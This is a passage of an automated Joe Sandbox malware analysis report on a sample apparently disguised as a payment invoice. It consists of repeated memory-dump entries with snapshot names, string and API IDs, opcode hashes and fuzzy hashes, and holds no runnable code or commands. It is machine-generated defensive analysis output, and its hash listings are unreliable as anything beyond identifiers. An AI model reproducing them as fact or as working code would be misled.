                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (iq
                                                                                              • API String ID: 0-3943945277
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: W
                                                                                              • API String ID: 0-655174618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (iq
                                                                                              • API String ID: 0-3943945277
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 098D41C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 098D41C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: fd335d2b18d47667ec34dd96cae6c51b49764f49d5468a55ad197648b6c81e34
                                                                                              • Instruction ID: eafe23fc9e1d116607a2a092b5749f6783fe7c31a976fd95c18dce7966d77c5f
                                                                                              • Opcode Fuzzy Hash: fd335d2b18d47667ec34dd96cae6c51b49764f49d5468a55ad197648b6c81e34
                                                                                              • Instruction Fuzzy Hash: 8B1128B1804249CFDB10DF9AC845BDEFBF8EB58324F108459D518A3351D774A944CFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              • Instruction ID: b203bf416c53624e4ad7e61e5299707c4f25174648834f05ad5ae6d23723ec6a
                                                                                              • Opcode Fuzzy Hash: 80734e6c3e58972315f4db761570267b9f33d8dc7d3176e127905cd818b9b4d3
                                                                                              • Instruction Fuzzy Hash: 2C414E34A10709CFCB14EFB8C88499DF7B6FF89304F118559E519AB325EB71AA85CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b637de8bb95c3f440be528fd2f082e162e8cb7dbd6fc49020189ac16d31208f
                                                                                              • Instruction ID: f12a617fe6e347502cf4b8d147badd44e65c45763ab9f8a275a5b81cb8342e0c
                                                                                              • Opcode Fuzzy Hash: 9b637de8bb95c3f440be528fd2f082e162e8cb7dbd6fc49020189ac16d31208f
                                                                                              • Instruction Fuzzy Hash: EA41D0B1D00349DFDB24DFA9C989A9DFBB5FF48304F24811AD818AB211D7756A89CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30cd081641303e560288fd34464d0ef819730b76bafee168777438378d94e6ae
                                                                                              • Instruction ID: 3ce94c5b01e9b2e1deccd97320a1e318a84dfae9e24d7ed5feaee015961bb6e5
                                                                                              • Opcode Fuzzy Hash: 30cd081641303e560288fd34464d0ef819730b76bafee168777438378d94e6ae
                                                                                              • Instruction Fuzzy Hash: 8D31A135A112198FCF04EBB8E8548EDF7B2FF89210B048569E905AB310EB70AD46CFC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 08372d148ad47539e2701155af703f7594dfac88d87dc5cc1d1e7a2a862b0a76
                                                                                              • Instruction ID: 06885758326e54d1a24ce0c7abf9bba044fc425ddab2f3886ad1aae789294583
                                                                                              • Opcode Fuzzy Hash: 08372d148ad47539e2701155af703f7594dfac88d87dc5cc1d1e7a2a862b0a76
                                                                                              • Instruction Fuzzy Hash: 9741C0B1D00349DBDB24DFA9C984A8DBBB5BF48304F24812AD918AB215D7756A89CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 040a0b8d1712560756b625b0042f1656c7d7157e81c12e0ddfdf1fae5008dc09
                                                                                              • Instruction ID: a4c9f9cd4e9807acb59b3850e96074008ae8706400639bdf4dd58e4375f3a186
                                                                                              • Opcode Fuzzy Hash: 040a0b8d1712560756b625b0042f1656c7d7157e81c12e0ddfdf1fae5008dc09
                                                                                              • Instruction Fuzzy Hash: 95412874A04246CFC715CF28C585AA9FBF1FF49314B4986AAD84ADB362D770EC85CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd5eed46277d7db6f4104f75bd86e67cb3569c66d54fdefe915de9eb12aa8630
                                                                                              • Instruction ID: 1d48871fe671cb48fc03644a43e7072abe436985264c2aed4e1a4643065df00b
                                                                                              • Opcode Fuzzy Hash: cd5eed46277d7db6f4104f75bd86e67cb3569c66d54fdefe915de9eb12aa8630
                                                                                              • Instruction Fuzzy Hash: EF41C1B0C00359DFCB14CF9AC889A9EFBB5FF89710F60811AE818AB224DB745845CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15ffc598842bbd279f2be19b3550eb15fce5757baa86e4ebb5777745c3af94f6
                                                                                              • Instruction ID: 4da5d084c15e2ec531a126f9f7d622648a4462e46275e7aa81697e01581ce09b
                                                                                              • Opcode Fuzzy Hash: 15ffc598842bbd279f2be19b3550eb15fce5757baa86e4ebb5777745c3af94f6
                                                                                              • Instruction Fuzzy Hash: 89410675A0020ADFCB40DFA9D88499EFBB5FF49310B14C659E918AB311E730AD85CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6f406b4e9c72661cc6d0143d91a03ac83849bf4a626165090f08f3c3b7eb5e4
                                                                                              • Instruction ID: 8e194ebeb1ad971ee34c0e4bd1eec13673a3762c1e227bf5ab1d14774a5a41d3
                                                                                              • Opcode Fuzzy Hash: d6f406b4e9c72661cc6d0143d91a03ac83849bf4a626165090f08f3c3b7eb5e4
                                                                                              • Instruction Fuzzy Hash: 4E21B4723142018FD7149B2DC88A6697BE5FFC5721B1984B9E90ACF3B6DA35DD0187D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00e26e05443e8187b978ee37f84fcecae62aacc8d5ec2ea453a899f0c6f3af40
                                                                                              • Instruction ID: 341e7ad62df382212b67f5e929a4c87bc0257ba24a9f2e17d7d5504c12c3a51e
                                                                                              • Opcode Fuzzy Hash: 00e26e05443e8187b978ee37f84fcecae62aacc8d5ec2ea453a899f0c6f3af40
                                                                                              • Instruction Fuzzy Hash: B63125716043008FCB11EF79D45889ABBF6FF85200B1588AED505DB3A1EB74EC0ACB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb725f513e919a5fd642730bfb4e8b03790ebcc57783f52a18ab5e0683d75d21
                                                                                              • Instruction ID: 19ff556b8ef6168c95295339f44370ae4cebd6d13717aed967dfc9977bc2abd5
                                                                                              • Opcode Fuzzy Hash: fb725f513e919a5fd642730bfb4e8b03790ebcc57783f52a18ab5e0683d75d21
                                                                                              • Instruction Fuzzy Hash: 0F21D8307092908FC715DB39D4A456E7FB2FFDA20071948EED486CB366CA349C46C761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c01d5b62a067e918f9163d6f8687872ff612d1c3f899bc0eaf73658c51cb2d05
                                                                                              • Instruction ID: 4387583fd94f8f5e3ba7c3334138548b7e31a4bfc2688ebd9d667cfc3c79d640
                                                                                              • Opcode Fuzzy Hash: c01d5b62a067e918f9163d6f8687872ff612d1c3f899bc0eaf73658c51cb2d05
                                                                                              • Instruction Fuzzy Hash: B7217371B012455BCF11DBA988499BFBBFAAFC5200F04856AE854E7261EA708E0187E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6b7a97d01868fa3671e28199c439e0fe3ef57401491b5e9d1a7a9c4c3b15d8b
                                                                                              • Instruction ID: 318caa492c97b588e8e691024d91c49ecbae356acd8039bf093b1e3ecc33dad7
                                                                                              • Opcode Fuzzy Hash: e6b7a97d01868fa3671e28199c439e0fe3ef57401491b5e9d1a7a9c4c3b15d8b
                                                                                              • Instruction Fuzzy Hash: 1521C172904240DFDB06DF98D9C4B27BF65FBCC320F64C56AE9090A266C336D416CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68df307e43be0c939e5b5b24a35d65c08265bf0d7ce477c72eb00b66561b4637
                                                                                              • Instruction ID: 51c0aa006ef1048123134bedab982959b4ab1074311e68b7609c51851632d37a
                                                                                              • Opcode Fuzzy Hash: 68df307e43be0c939e5b5b24a35d65c08265bf0d7ce477c72eb00b66561b4637
                                                                                              • Instruction Fuzzy Hash: 69210372904240DFDB06DF58D9C0B27BF65FBCC328F64C56AE9090B2A6C336D416CAA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5de8d74cce347265fa83a5f09907ca7ba8ff8a307f079512448a8d0fabf7c6da
                                                                                              • Instruction ID: 67d6eea89ea077f60057dfa0ed2dc31632373df9868e1d5cecbfbd70dd1ea121
                                                                                              • Opcode Fuzzy Hash: 5de8d74cce347265fa83a5f09907ca7ba8ff8a307f079512448a8d0fabf7c6da
                                                                                              • Instruction Fuzzy Hash: 1C2130319047099FCF00EFA9C89599DBBB5FF89300F5145AED545AB222EB30E989CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21d0e650c7ce96c468c84990e15196a6b8d156ccc63df097ba430033952df4d1
                                                                                              • Instruction ID: 9fe5927776339f794b85bd182b8963a493f2cecaa3f51f2a65ce21c6512003ff
                                                                                              • Opcode Fuzzy Hash: 21d0e650c7ce96c468c84990e15196a6b8d156ccc63df097ba430033952df4d1
                                                                                              • Instruction Fuzzy Hash: 34213E71904200DFEB06DF98D9C0B16BBA5FB94324F24C56EE9094B366C336D406CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c1f478d7de5e498aac3de6f75ad7d84f4c37aa993bbafdd9840d178262421fc
                                                                                              • Instruction ID: de347d2d35cd75bc129e6ac20b8f66008fa5eee5494543163ba5e321a1712090
                                                                                              • Opcode Fuzzy Hash: 9c1f478d7de5e498aac3de6f75ad7d84f4c37aa993bbafdd9840d178262421fc
                                                                                              • Instruction Fuzzy Hash: F02125B1904200DFEB15DF98D984B16BB65EB94318F20C56ED90A0B366C33AD407CA61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              • Instruction ID: dc1dc3ea3e2f17b06c85946a931ff014839ca89d3e2cbffca218c11f230c91ad
                                                                                              • Opcode Fuzzy Hash: c4b59976fc23a59d67fdba904ab64c46fac3c3fe55adfeffde11130a0ffcdf12
                                                                                              • Instruction Fuzzy Hash: 7E01D6B170C7545FCB1A9B38E451A697BE9EF8A61035844BBE846CB6A1CA21ED01C7D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 002b91faca14c809ac33fda03e822e8f3d01f5d8538eb3fcf866d729f1c8e2cc
                                                                                              • Instruction ID: 74bc99183364f05728a12472e81ac6f5cd105c52a1cd6f1c30f0905609827fe5
                                                                                              • Opcode Fuzzy Hash: 002b91faca14c809ac33fda03e822e8f3d01f5d8538eb3fcf866d729f1c8e2cc
                                                                                              • Instruction Fuzzy Hash: BF0122724083448FCB02CFA9D844B8ABFF0EF59310F04849AD548DB210D331D808CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72cbd6bd721fd4875b44655dc07f6d98924c0732a4c7d1a1b00464a43fced183
                                                                                              • Instruction ID: 4ee7ed0869349b9e98c79be844a3faf14660f170eae1ab171eb4451ac8925806
                                                                                              • Opcode Fuzzy Hash: 72cbd6bd721fd4875b44655dc07f6d98924c0732a4c7d1a1b00464a43fced183
                                                                                              • Instruction Fuzzy Hash: FC115631D00209DFCB40EFACC54589DBBF4FF45340B11859AD459DB221E7309A55CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 755752e04f1738bbdb3561bea8f156fde541da694f7439b1b6f720282ab84a7b
                                                                                              • Instruction ID: e5d30a8a4e5c34fa074e7906223656167f1d0fdddf75d3a055d5a5fb52b9620d
                                                                                              • Opcode Fuzzy Hash: 755752e04f1738bbdb3561bea8f156fde541da694f7439b1b6f720282ab84a7b
                                                                                              • Instruction Fuzzy Hash: 1801D2301087804FEB129B76E4113953FA2EF96300F0548AAE4D5CF296DBB4594ADB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b09343a8459d4cb7d30b9a8d7ac34d74788b756153f77a06331519af0fd05c68
                                                                                              • Instruction ID: d5456494a62ab2c2ff06c2674e2f6c17ea55d1e2846c3b42cd088852579cbe51
                                                                                              • Opcode Fuzzy Hash: b09343a8459d4cb7d30b9a8d7ac34d74788b756153f77a06331519af0fd05c68
                                                                                              • Instruction Fuzzy Hash: FF0117706007098FC724EF39C45555AB7F6FF85244B11866EE886CB260EB75EA81CBC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3edc32892c5627ef8388965be06936eaa2fb3ae67d4cd11b459bc10772340aed
                                                                                              • Instruction ID: ed45671bc2e32b04e7cccd2e6e6a21024664f90f548cc22efe35c780299da033
                                                                                              • Opcode Fuzzy Hash: 3edc32892c5627ef8388965be06936eaa2fb3ae67d4cd11b459bc10772340aed
                                                                                              • Instruction Fuzzy Hash: FC0124302057408BE722EB6AD0003A67BE6EF91300F40882EE485CB296DFF49949CFD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96d0fbc9ecab3a9e754a471976f51bfb1185fbb1a363843b4c594a4899e33e5c
                                                                                              • Instruction ID: 31f8c5353723f0ad7497bd0f17b085331760267640aed6fb3b5d79bb1a845f7a
                                                                                              • Opcode Fuzzy Hash: 96d0fbc9ecab3a9e754a471976f51bfb1185fbb1a363843b4c594a4899e33e5c
                                                                                              • Instruction Fuzzy Hash: 9AF09671B002145B8F15F7ACDC564BEBBBAEB89510F000428D905EB340EB704E11D7E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b056b4447c9f5be4abdc4b8bc4d324e7455faa93bd203ac46c25a14f87b9d23
                                                                                              • Instruction ID: 49ff1644c8b475472d945af187049b54c4d7cca23ceb406f723f59d12a358167
                                                                                              • Opcode Fuzzy Hash: 8b056b4447c9f5be4abdc4b8bc4d324e7455faa93bd203ac46c25a14f87b9d23
                                                                                              • Instruction Fuzzy Hash: 0DF0E2B030921A8BC724D63E8866A3A33DAEFC0A56705443EED07C3290EE60CF01D7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e240f07abdb6f564fdd0cbec746b64eca9d6c54cc1c255bdd7620911cfd0f746
                                                                                              • Instruction ID: 975e988fa357682b1e5453c76ba77e73fb7a837afe58859411d79a04a6a1bcdb
                                                                                              • Opcode Fuzzy Hash: e240f07abdb6f564fdd0cbec746b64eca9d6c54cc1c255bdd7620911cfd0f746
                                                                                              • Instruction Fuzzy Hash: 6AF0AF753047104BCB1A6A2C942566C3BA6EFC6911B0500BADC06CB3A1EE35CE02C7C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b3cfc6a9f0ee010e66c5a9c5a30c44c5d51d66b0a4f3c06048477fc0f437a94
                                                                                              • Instruction ID: 6c1b49f15f3e5823d1736e5a8945d40b26df1caf6b4e9fcce75f55c8ee047394
                                                                                              • Opcode Fuzzy Hash: 5b3cfc6a9f0ee010e66c5a9c5a30c44c5d51d66b0a4f3c06048477fc0f437a94
                                                                                              • Instruction Fuzzy Hash: 5DF0AF717007088BCB117B7C84054AEB779EFC1610F01466DDD45A7200EF34EA4186D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 658d84e975a108c88fc66d99ec7913e4cefebbc97ecfdc0f605ce3810d479ebf
                                                                                              • Instruction ID: b7f73b58482fd1dc70737911385b50ce1d6555bf57c66e383f78f991815a307c
                                                                                              • Opcode Fuzzy Hash: 658d84e975a108c88fc66d99ec7913e4cefebbc97ecfdc0f605ce3810d479ebf
                                                                                              • Instruction Fuzzy Hash: 33F05476300A154FC7149E6EE88485ABBA9EFD4265300467EE60FC7261DEB1AC498790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6e50373879060769e3210171800f624e18a88dd5694d650170a169dea34b762
                                                                                              • Instruction ID: 9888adde42769e4e4538345afc5c8f3fed19980d94614f22c94bb8ad63a78287
                                                                                              • Opcode Fuzzy Hash: c6e50373879060769e3210171800f624e18a88dd5694d650170a169dea34b762
